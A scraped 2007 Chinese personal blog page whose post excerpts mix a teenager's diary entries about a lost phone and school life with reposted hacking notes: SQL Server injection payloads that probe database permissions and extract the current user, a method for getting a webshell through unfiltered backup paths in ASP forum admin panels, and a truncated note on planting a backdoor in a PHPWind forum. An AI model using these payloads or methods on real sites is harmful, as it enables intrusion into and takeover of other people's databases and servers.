JnR 'bolg
百度空间 | 百度首页 
               
 
个人档案
 
vipjnr

海南 海口 
上次登录:
2007年11月
加为好友
 
   
 
文章分类
 
 
 
 
 
     
 
最近访客
 
 

qq25539088

zhouli1803

异世界神

k363642905

yandehua

51ailian

wenfusong2007

lnwshy
     
 
 
文章列表
 
2007-11-09 12:32

今天是手J丢的第二天

考试完了。。回来上网郁闷死的。。

交了几科的白卷~!

算了。。安心上网吧~!

让我继续秃废下去吧~!

 
2007-11-08 21:53

在学校。。同学看到我就问,你那个欣呢?

呵呵~!我都不知道怎么回答,也许我不在是我初二的我了。。

在宿舍。。舍友们看我就问,人家只喜欢那个欣!!

呵呵~!当场就愣了,不知道我心里怎么想的。。

自从那件事情以后,我几乎对早恋基本没兴趣了。。

同学以为我是GAY。。严重晕死。。

他们说我的思想不想正常思想。。

我也不怎么说他们了。。。

到了新的班级,一切都不一样了。。

原来那个喜欢逗人笑,比较活泼的我已经不在了。。。

已经被磨灭了。。我

 
2007-11-08 17:48

今天是手机丢的第一天

今天也是段考的第二天

考试第一天晚上有个JB打电话给我。。

说想要回手机的话给100RMB过来换我手机

注:他初一 我初三

我和他说你明天拿上来,我在多加你20.。

没想到第二天

 
2007-11-07 18:13
还算很有用,希望大家也会喜欢!

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' a
 
2007-11-07 18:12

主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。具体方法和分析可以参考angel的文章《动网论坛7.0获得WebShell的分析》。据我所知,目前还有很多的asp程序后台存在这样的漏洞,利用方法大同小异。

php+mysql程序

① 利用后台的数据查询功能

在有的程

 
2007-11-07 18:11

一、先安装mysql-connector-odbc-3.51.15-win32.msi。

二、是在ODBC数据源中建立一个DSN。具体方法是:
1、打开控制面板中的ODBD数据源;
2、选择系统DSN,添加一个新的DSN驱动程序;
3、选择MyODBD,出现一个对话框供输入MySQL:

(1)Windows DSN name:所要建立DSN的名称;
(2)MySQL Host (name or ip):MySQL服务器的名称或IP地址。一般填LocalHost ;
(3) MySQL database name:需要使用数据库的名称。
三、代码:


'mysql连接代码
strconnection = "

 
2007-11-07 18:11
pw的一个放后门的方式
data\bbscache\admin_record.php是记录后台登陆和操作的,我们看看是怎么操作这个文件的:
admin\admincp.php:
$bbsrecordfile
 
2007-11-07 18:10

用百度搜索"SB",为什么是google排第一?

首先,说明百度都谷歌很重视;对手能不重视?何况是"SB"这样中国文化里的经典词汇之拼音所写?

二是google本身对SB本身有很好的诠释,专门给SB开了一个二级玉米!http://sb.google.com/ 看看!

其他引擎怎么看?GOOGLE以后怎么在引擎圈里混?

知道GOOGLE 认为“SB”是谁么?往下看!

八卦了一把,那我们看看其他的引擎对"SB是如何钟爱的

 
2007-11-07 18:08
站内搜索地址为:
http://www.google.com/custom?domains=(这里写我们要搜索的站点,比如feelids.com)
进去可以选择www和feelids.com, 当然再选我们要的站内搜索哦!
黑客专用信息和资料搜索地址为:
http://www.google.com/custom?hl=xx-hacker
这里是google关键字的用法,要设置它为中文,则是
 
2007-11-07 18:08
来源:51CTO
一.嗅探器的基础知识
1.1 什么是嗅探器?
嗅探器的英文写法是Sniff,可以理解为一个安装在计算机上的窃听设备它可以用来窃听计算机在网络上所产生的众多的信息。简单一点解释:一部电话的窃听装置, 可以用来窃听双方通话的内容,而计算机网络嗅探器则可以窃听计算机程序在网络上发送和接收到的数据。

可是,计算机直接所传送的数据,事实上是大量的二进制数据。因此, 一个网络窃听程序必须也使用特定的网络协议来分解嗅探到的数据,嗅探器也就必须能够识别出那个协议对应于这个数据片断,只有这样才
 
     
 
 
背景音乐
 
 
留言板
 
     


©2009 Baidu